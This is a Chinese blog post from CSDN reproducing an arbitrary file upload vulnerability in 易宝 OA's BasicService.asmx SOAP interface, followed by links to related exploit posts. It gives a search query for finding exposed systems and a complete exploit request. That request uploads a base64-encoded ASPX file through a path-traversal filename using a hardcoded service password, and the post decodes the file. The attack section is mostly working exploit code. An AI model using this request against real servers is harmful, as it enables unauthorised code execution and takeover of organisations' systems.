【漏洞复现】易宝OA BasicService存在任意文件上传漏洞

最新推荐文章于 2024-10-13 17:16:36 发布
最新推荐文章于 2024-10-13 17:16:36 发布
阅读量510 收藏 5
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48368964/article/details/141231848
版权


》》》漏洞描述《《《

易宝 OA(Office Automation)是一款企业级办公自动化系统,旨在帮助企业实现高效的协同工作和业务流程管理。易宝 OA 提供了一系列功能强大的工具,包括但不限于流程审批、文档管理、日程安排、协同办公、人事管理等,为企业提供了一个集成化的解决方案。易宝 OA 的特点是易于使用、高度可定制、开放性强,支持多种平台和设备,可以满足不同企业的需求。易宝 OA 通过提高工作效率、降低运营成本、优化业务流程等方面,为企业带来了显著的商业价值。

》》》搜索语句《《《

product="顶讯科技-易宝OA系统"||title="欢迎登录易宝OA系统"

》》》漏洞复现《《《

POST /WebService/BasicService.asmx HTTP/1.1Host: Content-Type: text/xml; charset=utf-8SOAPAction: http://tempuri.org/UploadPersonalFileContent-Length: 666 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><UploadPersonalFile xmlns="http://tempuri.org/"><fs>PCVAUGFnZSBMYW5ndWFnZT0iQyMiJT4KPCUKUmVzcG9uc2UuV3JpdGUoRm9ybXNBdXRoZW50aWNhdGlvbi5IYXNoUGFzc3dvcmRGb3JTdG9yaW5nSW5Db25maWdGaWxlKCJ0ZXN0MTIzIiwgIk1ENSIpKTsKU3lzdGVtLklPLkZpbGUuRGVsZXRlKFJlcXVlc3QuUGh5c2ljYWxQYXRoKTsKJT4=</fs><FileName>../../manager/1.aspx</FileName><webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword></UploadPersonalFile></soap:Body></soap:Envelope>

xml中包含着一段base64编码的数据

%@Page Language="C#"%><%Response.Write(FormsAuthentication.HashPasswordForStoringInConfigFile("test123", "MD5"));System.IO.File.Delete(Request.PhysicalPath);%>

访问上传的1.aspx文件

A 八方
关注
专栏目录
漏洞复现易宝OA-BasicService-文件上传
知黑而守白
03-28 277
易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台,具有信息管理、 流程管理 、知识管理(档案和业务管理)、协同办公等多种功能。易宝OA系统 BasicService 接口存在任意文件上传漏洞,该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
易宝OA 多处 SQL注入漏洞复现
0xSec
11-30 1192
易宝OA ExecuteSqlForSingle、IsPartNumber接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息,用户名密码等凭据,进一步利用可获取服务器权限
漏洞复现易宝OA BasicService.asmx 任意存在任意文件上传漏洞
https://blog.echo234.cn/
03-26 689
易宝OA BasicService.asmx 存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
易宝OA BasicService存在任意文件上传漏洞
weixin_43167326的博客
03-28 954
易宝 OA(Office Automation)是一款企业级办公自动化系统,旨在帮助企业实现高效的协同工作和业务流程管理。易宝 OA 提供了一系列功能强大的工具,包括但不限于流程审批、文档管理、日程安排、协同办公、人事管理等,为企业提供了一个集成化的解决方案。易宝 OA 的特点是易于使用、高度可定制、开放性强,支持多种平台和设备,可以满足不同企业的需求。易宝 OA 通过提高工作效率、降低运营成本、优化业务流程等方面,为企业带来了显著的商业价值。
易宝OA ExecuteSqlForSingle接口 SQL注入漏洞
qq_45936921的博客
12-20 632
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
易宝OA系统ExecuteSqlForSingle接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
11-28 579
易宝OA系统ExecuteSqlForSingle接口存在SQL注入漏洞
SRC挖掘日常3
jennycisp的博客
05-06 849
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。如果你把每周要学的内容精细化到这种程度,你还会担心学不会,入不了门吗,其实说到底就是学了两个月,但都是东学一下,西学一下,什么内容都是浅尝辄止,没有深入进去,所以才会有学了2个月,入不了门这种感受。聊完宏观的,我们再落到具体的技术点上来,给你看看我给团队小伙伴制定的网络安全学习路线,整体大概半年左右,具体视每个人的情况而定。
易宝OA_BasicService接口任意文件上传漏洞
weixin_43567873的博客
03-28 97
易宝OA_BasicService接口任意文件上传漏洞
易宝OA 两处任意文件上传漏洞复现
0xSec
12-06 1184
易宝OA系统UploadFile​​​​​​​、BasicService.asmx等接口处存在文件上传漏洞,未授权的攻击者可以上传恶意后门程序执行任意代码,获取服务器权限
易宝OA_UploadFile接口任意文件上传漏洞
weixin_43567873的博客
03-28 260
易宝OA_UploadFile接口任意文件上传漏洞
新接口-易宝OA某接口存在任意文件读取漏洞-1day未公开漏洞
weixin_43167326的博客
02-25 946
易宝 OA(Office Automation)是一款企业级办公自动化系统,旨在帮助企业实现高效的协同工作和业务流程管理。易宝 OA 提供了一系列功能强大的工具,包括但不限于流程审批、文档管理、日程安排、协同办公、人事管理等,为企业提供了一个集成化的解决方案。易宝 OA 的特点是易于使用、高度可定制、开放性强,支持多种平台和设备,可以满足不同企业的需求。易宝 OA 通过提高工作效率、降低运营成本、优化业务流程等方面,为企业带来了显著的商业价值。
易宝OA GetProductInv SQL注入(含批量验证poc),作为一个网络安全程序员你还不会JetPack
2401_83946826的博客
04-20 400
易宝OA /SmartTradeScan/Inventory/GetProductInv 接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息,用户名密码等凭据,进一步利用可获取服务器权限。
易宝OA downloadfile 任意文件读取
2301_80115097的博客
06-21 330
易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台,具有信息管理、 流程管理 、知识管理(档案和业务管理)、协同办公等多种功能。声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。易宝OA downloadfile 文件读取,攻击者可通过此漏洞获取敏感信息。2、如非必要,禁止公网访问该系统。3、设置白名单访问。
易宝OA系统DownloadFile接口存在文件读取漏洞
qq_36334672的博客
03-06 274
易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台,具有信息管理、 流程管理 、知识管理(档案和业务管理)、协同办公等多种功能。DownloadFile接口处存在任意文件读取漏洞,未授权的攻击者可以利用此漏洞读取系统内部敏感配置文件,数据库密钥凭证等,使系统处于极不安全的状态。
漏洞复现易宝OA UploadFile存在任意文件上传漏洞
https://blog.echo234.cn/
03-28 889
易宝OA是一款非常强大的手机办公软件,这里不仅为广大的用户提供了一个更好的工作日历,而且每个人都可以在这里进行重要事项的记录,同时软件中还拥有更好的打卡系统,让用户可以快速记录自己的工作时常,而且调班与补卡也会更加的简单,让你工作活跃度得到提升。易宝OA UploadFile存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
易宝OA getStockInRequestPrintDetail SQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-08 82
易宝OA getStockInRequestPrintDetail SQL注入漏洞(含批量验证poc)
CTFHUB技能树之HTTP协议——响应包源代码
最新发布
weixin_73049307的博客
10-13 450
点击“开始”没有抓取到报文,先看看网页源代码是什么情况。居然直接给出flag了,不知道这题的意义何在。是个贪吃蛇小游戏,看不出来有什么特别的地方。
【OCPP】ocpp1.6协议第5.19 Update Firmware章节的介绍及翻译
qq_53871375的博客
10-11 348
在OCPP 1.6协议中,第5.19章节讨论了“Update Firmware”(更新固件)的功能。这一章节主要描述了如何通过充电站管理系统(CSMS)远程更新充电站的固件,以确保充电站能够支持最新的功能和修复已知的漏洞。该章节描述了通过远程操作更新充电站固件的流程。固件更新是维护充电站软件的一个关键部分,可以提高系统的稳定性、增加功能或修复安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值